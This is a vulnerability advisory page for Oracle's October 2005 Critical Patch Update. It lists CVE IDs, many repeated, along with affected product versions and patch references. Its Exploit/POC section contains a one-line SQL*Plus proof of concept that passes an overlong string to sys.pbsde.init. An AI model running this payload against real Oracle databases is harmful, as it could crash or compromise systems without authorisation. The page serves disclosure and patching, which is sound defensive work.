Oracle October Security Update Multiple Vulnerabilities

BID:15134

Info

Oracle October Security Update Multiple Vulnerabilities

Bugtraq ID: 15134
Class: Unknown
CVE: CVE-2005-0873
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-3437
CVE-2005-3438
CVE-2005-3439
CVE-2005-3440
CVE-2005-3441
CVE-2005-3442
CVE-2005-3443
CVE-2005-3444
CVE-2005-3445
CVE-2005-3446
CVE-2005-3447
CVE-2005-3448
CVE-2005-3449
CVE-2005-3450
CVE-2005-3451
CVE-2005-3452
CVE-2005-3453
CVE-2005-3454
CVE-2005-3455
CVE-2005-3456
CVE-2005-3457
CVE-2005-3458
CVE-2005-3459
CVE-2005-3460
CVE-2005-3461
CVE-2005-3462
CVE-2005-3463
CVE-2005-3464
CVE-2005-3465
CVE-2005-3466
CVE-2005-0873
Remote: Yes
Local: Yes
Published: Oct 18 2005 12:00AM
Updated: Oct 23 2012 03:40PM
Credit: The following people are credited for the discovery of vulnerabilities listed in the Critical Patch Update: Brian Carr; Sacha Faust of S.P.I. Dynamics, Inc.; Esteban Martínez Fayó of Application Security, Inc.; Alexander Kornbrust of Red Database Securi
Vulnerable: PeopleSoft PeopleTools 8.46.3
PeopleSoft PeopleTools 8.45.5
PeopleSoft PeopleTools 8.43
PeopleSoft PeopleTools 8.42
PeopleSoft PeopleTools 8.41
PeopleSoft PeopleTools 8.40
PeopleSoft PeopleTools 8.20.7
PeopleSoft PeopleTools 8.20
PeopleSoft PeopleTools 8.19
PeopleSoft PeopleTools 8.18
PeopleSoft PeopleTools 8.17
PeopleSoft PeopleTools 8.16
PeopleSoft PeopleTools 8.15
PeopleSoft PeopleTools 8.14
PeopleSoft PeopleTools 8.13
PeopleSoft PeopleTools 8.12
PeopleSoft PeopleTools 8.11
PeopleSoft PeopleTools 8.10
PeopleSoft CRM 8.9
PeopleSoft CRM 8.8.1
Oracle Workflow 11.5.9 .5
Oracle Workflow 11.5.1
Oracle PeopleSoft Enterprise Customer Relationship Manage 8.9
Oracle Oracle9i Standard Edition 9.2 .6
Oracle Oracle9i Standard Edition 9.2 .0.5
Oracle Oracle9i Standard Edition 9.0.1 .5 FIPS
Oracle Oracle9i Standard Edition 9.0.1 .5
Oracle Oracle9i Standard Edition 9.0.1 .4
Oracle Oracle9i Personal Edition 9.2 .7
Oracle Oracle9i Personal Edition 9.2 .6
Oracle Oracle9i Personal Edition 9.2 .0.5
Oracle Oracle9i Personal Edition 9.0.1 .5 FIPS
Oracle Oracle9i Personal Edition 9.0.1 .5
Oracle Oracle9i Personal Edition 9.0.1 .4
Oracle Oracle9i Enterprise Edition 9.2 .7.0
Oracle Oracle9i Enterprise Edition 9.2 .6.0
Oracle Oracle9i Enterprise Edition 9.2 .0.5
Oracle Oracle9i Enterprise Edition 9.0.1 .5 FIPS
Oracle Oracle9i Enterprise Edition 9.0.1 .5
Oracle Oracle9i Enterprise Edition 9.0.1 .4
Oracle Oracle9i Application Server Web Cache 9.0.3 .1
Oracle Oracle9i Application Server Web Cache 9.0.2 .3
Oracle Oracle9i Application Server 9.2 .0.7
Oracle Oracle9i Application Server 9.2 .0.6
Oracle Oracle9i Application Server 9.0.3 .1
Oracle Oracle9i Application Server 9.0.2 .3
Oracle Oracle8i Standard Edition 8.1.7 .4
Oracle Oracle8i Standard Edition 8.0.6 .3
Oracle Oracle8i Standard Edition 8.0.6
Oracle Oracle8i Enterprise Edition 8.1.7 .4.0
Oracle Oracle8 8.1.7 .4
Oracle Oracle8 8.0.6 .3
Oracle Oracle8 8.0.6
Oracle Oracle10g Standard Edition 10.1 .4.2
Oracle Oracle10g Standard Edition 10.1 .0.4
Oracle Oracle10g Standard Edition 10.1 .0.3.1
Oracle Oracle10g Standard Edition 10.1 .0.3
Oracle Oracle10g Standard Edition 10.1 .0.2
Oracle Oracle10g Personal Edition 10.1 .0.4
Oracle Oracle10g Personal Edition 10.1 .0.3.1
Oracle Oracle10g Personal Edition 10.1 .0.3
Oracle Oracle10g Personal Edition 10.1 .0.2
Oracle Oracle10g Enterprise Edition 10.1 .4.2
Oracle Oracle10g Enterprise Edition 10.1 .0.4
Oracle Oracle10g Enterprise Edition 10.1 .0.3.1
Oracle Oracle10g Enterprise Edition 10.1 .0.3
Oracle Oracle10g Enterprise Edition 10.1 .0.2
Oracle Oracle10g Application Server 10.1.2
Oracle Oracle10g Application Server 10.1 .0.4
Oracle Oracle10g Application Server 10.1 .0.3.1
Oracle Oracle10g Application Server 10.1 .0.3
Oracle Oracle10g Application Server 10.1 .0.2
Oracle Oracle 9i Application Server Release 1 1.0.2 .2
Oracle JD Edwards EnterpriseOne 8.95 _B1
Oracle JD Edwards EnterpriseOne 8.94 _Q1
Oracle JD Edwards EnterpriseOne SP23_K1
Oracle Enterprise Manager Grid Control 10g 10.1 .4
Oracle Enterprise Manager Grid Control 10g 10.1 .3
Oracle Enterprise Manager Database Control 10g 10.1 .0.4
Oracle Enterprise Manager Database Control 10g 10.1 .0.3
Oracle Enterprise Manager Application Server Control 9.0.4 .2
Oracle Enterprise Manager Application Server Control 9.0.4 .1
Oracle Enterprise Manager 9.0.4 .1
Oracle E-Business Suite 11i 11.5.10
Oracle E-Business Suite 11i 11.5.9
Oracle E-Business Suite 11i 11.5.8
Oracle E-Business Suite 11i 11.5.7
Oracle E-Business Suite 11i 11.5.6
Oracle E-Business Suite 11i 11.5.5
Oracle E-Business Suite 11i 11.5.4
Oracle E-Business Suite 11i 11.5.3
Oracle E-Business Suite 11i 11.5.2
Oracle E-Business Suite 11i 11.5.1
Oracle E-Business Suite 11i 11.5
Oracle E-Business Suite 11.0
Oracle Developer Suite 10.1.2
Oracle Developer Suite 9.0.4 .2
Oracle Developer Suite 9.0.4 .1
Oracle Developer Suite 9.0.2 .1
Oracle Collaboration Suite Release 2 9.0.4 .2
Oracle Collaboration Suite Release 1 10.1.1
Oracle Collaboration Suite Release 1
Oracle Clinical 4.5.1
Oracle Clinical 4.5
Oracle Application Server Release 2 10.1.2 .0.2
Oracle Application Server Release 2 10.1.2 .0.1
Oracle Application Server Release 2 10.1.2 .0.0
Oracle Application Server Release 2 9.0.2 .3
Oracle Application Server Release 2 9.0.2 .1
Oracle Application Server 10g 9.0.4 .2
Oracle Application Server 10g 9.0.4 .1
Oracle Application Server 10g 9.0.4
Oracle Application Server 10.1.2 .0.2
HP HP-UX 11.23
HP HP-UX 11.11
HP HP-UX B.11.23
HP HP-UX B.11.11
Not Vulnerable:

Discussion

Oracle October Security Update Multiple Vulnerabilities

Various Oracle Database Server, Oracle Enterprise Manager, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite and Applications, and Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne are affected by multiple vulnerabilities.

The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats.

Oracle has released a Critical Patch Update advisory for October 2005 to address these vulnerabilities. This Critical Patch Update addresses the vulnerabilities for supported releases. Earlier, unsupported releases are likely to be affected by the issues as well.

Specific details regarding these vulnerabilities are not currently available.

This record will be updated and split into individual BIDs for each issue as further information is disclosed.

Exploit / POC

Oracle October Security Update Multiple Vulnerabilities

An exploit would not be required for some of these issues such as the SQL injection vulnerabilities. Other issues would likely require exploit code.

The following proof of concept code provided by <[email protected]> is available for DB27:

SQL> exec
sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL);
BEGIN
sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL); END;

---
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

Solution / Fix

Oracle October Security Update Multiple Vulnerabilities

Solution:
Oracle has released a Critical Patch Update (Critical Patch Update - October 2005) to address these issues. Information regarding obtaining and applying appropriate patches can be found in the referenced Oracle Critical Patch Update.

Pre-installation notes for Oracle Database Server can be found at the following location:
http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=333956.1

Pre-installation notes for Oracle Application Server can be found at the following location:
http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=333959.1

Pre-installation notes for Oracle Collaboration Suite can be found at the following location:
http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=333961.1

Pre-installation notes for Oracle E-Business Suite and Applications can be found at the following location:
http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=333963.1

Pre-installation notes for Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne can be found at the following location:
http://www.peoplesoft.com/corp/en/support/security_index.jsp

A message from "David Litchfield" <[email protected]> is available that states that some of the vulnerabilities in Oracle Critical Patch Update - October 2005 may not have been successfully fixed by Oracle. Users of affected packages should refer to the referenced message, and contact their vendor for further information on the status of fixes.

HP has released advisory HPSBMA01235 (SSRT051055 rev.0 - HP Oracle for OpenView (OfO) Critical Patch Update October 2005) to identify vulnerable HP packages and fixes. HP advises users of Oracle for Openview who have support contracts with Oracle to obtain Critical Patch Update - October 2005 from Oracle. Users of Oracle for Openview who have support contracts with HP can contact HP for fixes. Please see the referenced advisory for more information.

A message from "NGSSoftware Insight Security Research" <[email protected]> (Oracle October 2005 CPU Problems) states that there is a flaw in the fix for the CTXSYS component of Oracle 8.1.7.4 on all platforms. Please see the referenced message for further details on this issue.

References

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report